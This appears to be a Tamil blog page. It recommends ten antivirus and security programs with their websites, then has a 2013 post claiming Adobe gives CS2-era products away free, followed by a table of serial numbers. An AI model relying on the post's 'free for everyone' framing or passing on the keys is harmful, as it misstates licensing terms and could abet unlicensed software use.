இது லினக்ஸ் இயக்கத்தில் செயல்படும் சர்வர்களுக்கென வடிவமைக்கப்பட்டது. அத்தகைய சர்வர்கள் வைத்திருப்போர் கட்டாயம் இதனை இன்ஸ்டால் செய்து வைத்திருக்க வேண்டும். இதனைப் பெற http://www.clamav.net/lang/en/ என்ற முகவரியில் உள்ள தளத்திற்குச் செல்லவும்.

4.அவாஸ்ட் (Avast): :

இந்த புரோகிராம் தருவது போல பல ஆப்ஷன்களை மற்ற புரோகிராம்கள் தருவது இல்லை. இதன் தள முகவரி: http://www.avast.com/


5. ஆர் கே ஹண்டர் (rk hunter) :

இதன் சிறப்பு இது ஒரு ரூட்கிட் எதிர்ப்பு டூலாகும். நம்மில் பெரும்பாலானவர்கள் ரூட்கிட் நமக்கு தரக்கூடிய பாதிப்புகளை அறிந்திருப்பது இல்லை. மேக் கம்ப்யூட்டர்களில் பெரும்பாலும் இது சேதத்தை விளைவிக்கும். உங்களிடம் உள்ள ஆண்ட்டி வைரஸ் புரோகிராம் ரூட்கிட்களுக்கு எதிரான பாதுகாப்பினை வழங்கவில்லை என்றால்,இதனை உடனே நிறுவுவது அவசியம்.

இது குறித்த கூடுதல் தகவல்களுக்கு http://rkhunter.sourceforge.net/ என்ற முகவரியில் உள்ள தளத்தினை அணுகவும்.

6. டாக்டர் வெப் க்யூர்இட் (Dr.Web CureIt):

இந்த ஆண்ட்டி வைரஸ் புரோகிராமினை இன்ஸ்டால் செய்திட வேண்டியதில்லை. இது ஒரு சிறிய பைனரி பைல். இதன் மீது டபுள் கிளிக் செய்தால், அது நம் கம்ப்யூட்டரை ஸ்கேன் செய்திடும். இதில் ஒரே ஒரு பிரச்னை உள்ளது. இதன் அண்மைக் காலத்திய மேம்படுத்தப்பட்ட புரோகிராமினை அப்படியே அப்டேட் செய்திட முடியாது.

மீண்டும் புதிதாக டவுண்லோட் செய்து பயன்படுத்த வேண்டும். இதனை போர்ட்டபிள் வைரஸ் ஸ்கேனராகப் பயன்படுத்தலாம். மேலும் தகவல்களுக்குhttp://www.freedrweb.com/cureit/?lng=en என்ற இணைய தளத்தினை அணுகவும்.

7. இ செட் ஸ்மார்ட் செக்யூரிட்டி (ESET Smart Security):
NOD32 என்னும் ஆண்ட்டி வைரஸ் டூலைத் தந்தவர்களே இதனையும் தந்துள்ளனர். இது ஆண்ட்டி வைரஸ் மற்றும் பயர்வால் புரோகிராம்களாகச் செயல்படுகிறது. இதன் பயர்வால் செயல்பாடு சற்று விசித்திரமானது. இது இருக்கும் கம்ப்யூட்டரில் இன்டர்நெட் எப்படி பயன்படுத்தப்படுகிறது என்பதை, நம்மிடமிருந்து கற்றுக் கொண்டு, அதற்கேற்ற வகையில் செயல்படுகிறது.

டேட்டா திருடு போகாமலும், நம் ஆண்ட்டி வைரஸ் புரோகிராம்களின் செயல்பாட்டை முடக்கும் வைரஸ்களை இயங்கவிடாமலும் இது தடுக்கிறது. மேலும் தகவல்களுக்கு http://www.eset.com/home/smartsecurity என்ற தளம் செல்லவும்.


8. ஐ ஆண்ட்டி வைரஸ் (iAnti Virus):

இதன் பெயரில் உள்ள ஐ என்பதைப் பார்த்தவுடன் இந்த ஆண்ட்டி வைரஸ் புரோகிராம், மேக் கம்ப்யூட்டர்களுக்கானது என்று அறிந்திருப்பீர்கள். மேக் கம்ப்யூட்டர்களில் எல்லாம் வைரஸ் வராது என்று சொல்லிக் கொண்டிருந்ததெல்லாம் அந்தக் காலம். இப்போதெல்லாம், விண்டோஸ், மேக் மற்றும் லினக்ஸ் என அனைத்து வகை சிஸ்டங்களிலும் வைரஸ்கள் புகுந்து நாசம் விளைவிக்கின்றன.

இந்த ஆண்ட்டி வைரஸ் புரோகிராம் செயல்படுவதும், மேக் கம்ப்யூட்டர் இன்டர்பேஸ் போல ஒன்றின் வழியாகத்தான். மேக் சிஸ்டத்திற்கு மிகச் சரியான ஆண்ட்டி வைரஸ் புரோகிராம் இது. கூடுதல் தகவல்களுக்கு http://www.iantivirus. com/ என்ற முகவரியில் உள்ள தளத்திற்குச் செல்லவும்.

9. மைக்ரோசாப்ட் செக்யூரிட்டி எசன்ஷியல்ஸ் (Microsoft Security Essentials)

பல்வேறு ஆண்ட்டி வைரஸ் தொகுப்புகளை மேலே பார்த்தோம். மைக்ரோசாப்ட் வெளியிட்டுள்ள இதனையும் நாம் கவனிக்க வேண்டும். இதில் குறிப்பிடத்தக்க சிறப்பு, மைக்ரோசாப்ட் தரும் இந்த ஆண்ட்டி வைரஸ் தொகுப்பு இலவசமாகும்.

பொதுவாக மைக்ரோசாப்ட் மற்றும் இலவசம் என்ற இரண்டும் இøணையாது. இது ஒரு விதிவிலக்காகும். இதனைப் பெறவும், தகவல்களை அறியவும் http://windows.microsoft.com/en-US/windows/security-essentials-download என்ற முகவரியில் உள்ள மைக்ரோசாப்ட் தளம் செல்லவும்.

10. ஸோன் அலார்ம் (Zone Alarm):

மற்ற ஆண்ட்டி வைரஸ் தராத ஒரு சிறப்பான உதவியை ஸோன் அலார்ம் செய்கிறது. டேட்டா லாக் என்னும் டூலை ஸோன் அலார்ம் தருகிறது. உங்கள் ஹார்ட் டிஸ்க்கில் இருக்கும் டேட்டாவிற்கு என்கிரிப்ஷன் மூலம் பாதுகாப்பு தரும் வேலையையும் இது மேற்கொள்கிறது. எனவே என்கிரிப்ஷன் கீ இல்லாதவர்கள் டேட்டாவினப் படித்து அறிய இயலாது.


அதே போல கம்ப்யூட்டரை பூட் செய்வதிலும் இது பாதுகாப்பு தருகிறது. எனவே ஆண்ட்டி வைரஸ், என்கிரிப்ஷன், பூட் அனுமதி என கூடுதல் வசதிகளையும் இந்த ஆண்ட்டி வைரஸ் புரோகிரம் தருகிறது. மேலும் தகவல்களுக்கு http://www.zonealarm.com/ என்ற தளம் செல்லவும்.

-:சுட்டது:-

நன்றி அன்பு




வியாழன், 17 ஜனவரி, 2013

Adobe CS2 மென்பொருட்களை இலவசமாக பெற / தரவிறக்க

மென்பொருள் வடிவமைப்பில் முன்னணியில் இருக்கும் Adobe நிறுவனமானது தனது Adobe CS2 இன் முழுமையான பதிப்பை முற்றிலும் இலவசமாக தரவிறக்கம் செய்யும் வசதியை வழங்கியுள்ளது. Windows மற்றும் Mac OS இயங்குதளங்களில் இயங்க கூடியவாறு வடிவமைக்கப்பட்டு 2005ல் வெளியிடப்பட்ட Photoshop CS2, Illustrator CS2, Adobe Premier Pro 2, InDesign CS2 போன்ற இப்பதிப்புக்களுக்கான Serial Number போன்றவற்றினையும் Adobe நிறுவனம் இலவசமாக தருகின்றது.



PRODUCT
PLATFORM
DOWNLOADS
SERIAL NUMBER
Creative Suite 2
Mac
1130-0412-8377-1896-9751-5759

Windows
1130-1414-7569-4457-6613-5551
Acrobat 3D 1.0 for Windows
Windows
1159-1414-7569-3493-5006-5653
Acrobat Standard 7.0
Mac
1016-0414-2428-7157-5404-6669
Windows
1016-1415-6379-6184-1333-2468
Acrobat Pro 8.0
Mac
1118-0416-1130-3724-2927-7040
Windows
1118-1414-1955-8737-8172-0350
Audition 3.0
Windows
1137-1004-8571-6848-7845-8029
GoLive CS2
Mac
1033-0415-6162-2671-3431-0993
Windows
1033-1418-1610-5696-5209-0095
Illustrator CS2
Mac
1034-0416-0740-0527-2887-2375
Windows
1034-1415-6230-2341-2884-9398
InCopy CS2
Mac
1036-0414-4367-5110-5897-2432
Windows
1036-1419-3531-6378-2148-9313
InDesign CS2
Mac
1037-0413-9961-4063-8457-1098
Windows
1037-1412-5094-8316-6812-7982
Photoshop CS2
Mac
1045-0410-5403-3188-5429-0639
Windows
1045-1412-5685-1654-6343-1431
Photoshop Elements 4.0/5.0
Mac
1057-0410-8218-6295-1699-9560
Windows
1057-1414-3729-7573-7352-1206
Adobe Premiere Pro 2.0
Windows
1132-1280-4900-7476-5108-8019